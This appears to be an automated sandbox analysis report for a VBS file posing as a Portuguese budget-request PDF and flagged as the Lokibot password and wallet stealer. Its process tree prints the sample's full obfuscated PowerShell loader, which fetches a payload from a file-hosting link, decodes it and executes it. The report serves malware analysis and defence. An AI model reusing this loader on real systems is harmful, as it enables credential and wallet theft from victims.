Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/03/2024, 17:07

General

  • Target

    Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs

  • Size

    20KB

  • MD5

    6c172c78edfa9cf3fbcee9e6417b4ec0

  • SHA1

    56d554a6cfae0cbee45a32ac9e7f261c910cd046

  • SHA256

    18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad

  • SHA512

    881216852a4049ce32387b221791b9ba7c75c4decb9b869430842a7a540f52ec1a24ae9a41550e0feb0dcf58731dcdd2dda9bcd45c798e0403af0fefaa751c27

  • SSDEEP

    384:CE68ihBTZ6i8ahvxSIp27nn15lNmpK2kn70Vuz3+44GE8gT:H68ihdgi/LfIn3lNmpK2k7Sau4m8M

Malware Config

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- 
DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme 
eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. 
Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3484
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2948
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4956
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:4216
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:2568
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Accesses Microsoft Outlook profiles
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:1088
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3180 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:3908

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            3KB

            MD5

            9f0edd78a6aaca110c79013771d6001a

            SHA1

            5b96b41d1881dab66b4379cf0ada08ff0bbbd834

            SHA256

            611b8b6bca22e3a5244ddfbd691a0ae85134682397b60bf0cf3b0a7eb7fa8eae

            SHA512

            4bb07b481f5dbba051aa97b08c107b2cef894d2d672bcbbef95159d31cf776663db1026f0cccbe2ef3532841b83a48966a70a15576cabdb4821a8d6cb5fd9608

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            4KB

            MD5

            5c70ac32cd66791376b62c77311b502f

            SHA1

            de76395b2e4dc43d7de2c2b16d6c2fc708877379

            SHA256

            d76f34448ff1872b89bf50073022ff97fe0727b0edf8fe2532c5a62a99fa2cdf

            SHA512

            1467790a710fef3c26ba806e225cea1183ab85ece56c9a2e29c3490bde7888d5bd6fd1630108b99e379f0f23f29e0ba1d78e1dcedb5e6d73c73e8e09e4cabfa2

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            1KB

            MD5

            bd20ec18e46ec8314987aaada98f10fd

            SHA1

            8f51d5e778fc71bafdde641b75f398e39eecc62a

            SHA256

            64cbcd3e70eb4b7f448c05342a3a7c9ce1dcf240d9d04b32a48fda0373c221f9

            SHA512

            8a5002870a7b1169ba2ea8395a5c5ca395967594f196150c7bc9a2734ebcd89d8e2d6907b4358d404d431950bc87c5baba150c2448e3a260ed753b9e25f5b170

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            1KB

            MD5

            8f730c551500d56834bbf653c4967bfa

            SHA1

            743ced63ecf36448118864ebb17326215c39a47c

            SHA256

            70054f0aa395f386ba7751641347c2cb5e5f730769139691324ede08b5e0792f

            SHA512

            7f74b3322094bad9ad169608679c299f91c4b0cafcd503d21994b8a3b1027db1994997aa0ddcee56e70a4169434c473dd3cbd7ebbc485b37de465f7799bf9ade

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            3KB

            MD5

            3a77b94591bc1515432be570e46a0e8c

            SHA1

            4abaf647d3adcd56bc7247e272b7d80dfba74dcf

            SHA256

            904c10020cd2ed4c085f02c125fa373f693454dce4bc7015a0bca543cdf9459d

            SHA512

            9bf2e8a1638283ffc19e75d4f669e734ca90de46890c38a3e28390a2ac1b8bc1cdc55c18236f5728d962dacd4fe079e31ebdc22d1f69dc8267fc6d7d7d699867

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wr3xaxqx.gts.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1088-344-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-348-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-320-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-318-0x0000000077A28000-0x0000000077A29000-memory.dmp

            Filesize

            4KB

          • memory/1088-319-0x00000000779A1000-0x0000000077AC1000-memory.dmp

            Filesize

            1.1MB

          • memory/1088-335-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-337-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-358-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-359-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-357-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-356-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-338-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-336-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-355-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-354-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-353-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-352-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-339-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-341-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-340-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-351-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-342-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-350-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-347-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-346-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-333-0x00000000012C0000-0x0000000005698000-memory.dmp

            Filesize

            67.8MB

          • memory/1088-345-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-334-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-343-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/3484-301-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-274-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-293-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-294-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-280-0x00007FFA052F0000-0x00007FFA05DB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3484-268-0x000001B869340000-0x000001B869362000-memory.dmp

            Filesize

            136KB

          • memory/3484-277-0x000001B8698A0000-0x000001B8698B4000-memory.dmp

            Filesize

            80KB

          • memory/3484-276-0x000001B869850000-0x000001B869876000-memory.dmp

            Filesize

            152KB

          • memory/3484-272-0x00007FFA052F0000-0x00007FFA05DB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3484-273-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-275-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/4956-283-0x0000000005390000-0x00000000059B8000-memory.dmp

            Filesize

            6.2MB

          • memory/4956-317-0x00000000779A1000-0x0000000077AC1000-memory.dmp

            Filesize

            1.1MB

          • memory/4956-316-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-313-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-314-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-312-0x0000000008C60000-0x000000000D038000-memory.dmp

            Filesize

            67.8MB

          • memory/4956-311-0x0000000007A30000-0x0000000007A31000-memory.dmp

            Filesize

            4KB

          • memory/4956-309-0x0000000074F80000-0x0000000075730000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-310-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-308-0x0000000007770000-0x0000000007784000-memory.dmp

            Filesize

            80KB

          • memory/4956-307-0x0000000007710000-0x0000000007732000-memory.dmp

            Filesize

            136KB

          • memory/4956-306-0x00000000086B0000-0x0000000008C54000-memory.dmp

            Filesize

            5.6MB

          • memory/4956-304-0x00000000074F0000-0x0000000007586000-memory.dmp

            Filesize

            600KB

          • memory/4956-305-0x00000000074A0000-0x00000000074C2000-memory.dmp

            Filesize

            136KB

          • memory/4956-303-0x0000000007420000-0x000000000743A000-memory.dmp

            Filesize

            104KB

          • memory/4956-349-0x0000000074F80000-0x0000000075730000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-302-0x0000000007A80000-0x00000000080FA000-memory.dmp

            Filesize

            6.5MB

          • memory/4956-300-0x0000000006390000-0x00000000063DC000-memory.dmp

            Filesize

            304KB

          • memory/4956-299-0x0000000006300000-0x000000000631E000-memory.dmp

            Filesize

            120KB

          • memory/4956-292-0x0000000005C10000-0x0000000005F64000-memory.dmp

            Filesize

            3.3MB

          • memory/4956-286-0x0000000005AA0000-0x0000000005B06000-memory.dmp

            Filesize

            408KB

          • memory/4956-285-0x0000000005A30000-0x0000000005A96000-memory.dmp

            Filesize

            408KB

          • memory/4956-284-0x00000000051F0000-0x0000000005212000-memory.dmp

            Filesize

            136KB

          • memory/4956-281-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-282-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-279-0x0000000074F80000-0x0000000075730000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-278-0x00000000028B0000-0x00000000028E6000-memory.dmp

            Filesize

            216KB